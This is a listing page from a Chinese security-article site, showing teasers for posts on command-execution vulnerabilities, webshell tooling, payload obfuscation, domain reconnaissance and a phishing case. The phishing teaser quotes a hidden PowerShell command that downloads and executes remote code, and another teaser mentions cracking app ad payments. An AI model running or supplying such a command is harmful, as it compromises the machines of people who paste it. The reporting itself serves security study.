invoke - 第 5 | CN-SEC 中文网

安全漏洞

用友NC系统的命令执行漏洞ActionInvokeService的分析

好久好久没更新！！！！share一篇存稿，快hvv了 0-0 有任何问题欢迎师傅们联系讨论交流！！！向师傅们学习！！ https://security.yonyou.com/#/noticeInfo?...

10月15日43 views评论

阅读全文

程序逆向

游戏广告sdk分析浅析

游戏广告sdk分析浅析最开始接触安卓逆向的时候就是广告的破解，当时基本上都是通过修改smail来绕过广告的支付条件，后来闲的无聊，就研究了几种广告的sdk，说来也非常的简单，本篇文章简单的介绍下，休闲...

10月13日46 views评论

阅读全文

安全文章

实战jboss getshell

开局awvs高危搜索下很快就找到一篇文章 https://medium.com/@r0t1v/pwning-jboss-seam-2-like-a-boss-da5a43da6998 看了下好像是e...

10月11日33 views评论

阅读全文

安全文章

【网络钓鱼】女神电脑沦陷记

女神电脑沦陷记通过邮件发送钓鱼信息访问提示连接不安全跳转验证机器人操作诱导你完成复制粘贴powershell.exe -w hidden -Command "iex (iwr '[https://]2...

09月24日33 views评论

阅读全文

安全工具

AntSword新增类型：JSPRAW的一些玩法

背景最近给AntSword新增了一种类型：JSPRAW，主要有以下两点改进：JSPRAW不再使用其他参数进行传参，同时支持key-value键值对以及raw传参形式新增toString触发方式，Pay...

09月23日24 views评论

阅读全文

安全文章

Payload Obfuscation

目录：· 什么是混淆· 什么i. 调用-混淆ii. BetterXencrypt 公司· 混淆我们的 payload· 测试· 结论1. 什么是混淆：可以立即识别以任何形式创建的简单有效负载。混淆是一...

09月18日23 views评论

阅读全文

安全工具

SessionExec：一款针对会话安全的安全命令测试工具

关于SessionExecSessionExec是一款针对会话安全的安全命令测试工具，该工具允许在 Windows 系统上的其他会话中执行指定的命令，可以针对特定的会话 ID 或所有会话，并可以选择抑...

09月16日24 views评论

阅读全文

安全工具

Invoke-Maldaptive：一款针对LDAP SearchFilter的安全分析工具

关于Invoke-Maldaptive MaLDAPtive 是一款针对LDAP SearchFilter的安全分析工具，旨在用于对LDAP SearchFilter 执行安全解析、混淆、反混淆和安全...

09月13日11 views评论

阅读全文

内网域之域内信息收集

查询当前登录域及登录用户信息判断主域 ①：显示发生系统错误，说明存在域，但当前用户非域用户 ②：正确回显DC的时间，说明当前用户为域用户 ③：显示找不到域 WORKGROUP 的域控制器，说明当前环...

09月09日安全文章26 views已关闭评论

阅读全文

A command similar to wget in Windows: Invoke-WebRequest

0x00 TL;DRLinux can use wget command to download files. In this article, we will introduce the power...

08月14日安全博客14 views评论

阅读全文

安全新闻

AJ-REPORT全新鉴权及远程命令修复绕过

TL;DR前几天在公众号看到AJ-Report未授权远程命令执行，这个洞还挺通杀的。今天看了下命令执行似乎已经修复了，但是这里的patch可以绕过。另外最关键的TokenFilter中的鉴权绕过漏洞没...

07月31日24 views评论

阅读全文

安全文章

记一次Apache某项目的漏洞复现与挖掘

前言挺早之前有个Apache DolphinScheduler 任意文件读取漏洞，之前有看过这个，后面又有好兄弟问我，就研究了一下。本来简单的diff了一下，以为发现了问题，但是事情没有我想的那么简...

07月16日12 views评论

阅读全文

用友NC系统的命令执行漏洞ActionInvokeService的分析

游戏广告sdk分析浅析

实战jboss getshell

【网络钓鱼】女神电脑沦陷记

AntSword新增类型：JSPRAW的一些玩法

Payload Obfuscation

SessionExec：一款针对会话安全的安全命令测试工具

Invoke-Maldaptive：一款针对LDAP SearchFilter的安全分析工具

内网域之域内信息收集

A command similar to wget in Windows: Invoke-WebRequest

AJ-REPORT全新鉴权及远程命令修复绕过

记一次Apache某项目的漏洞复现与挖掘

在线咨询

微信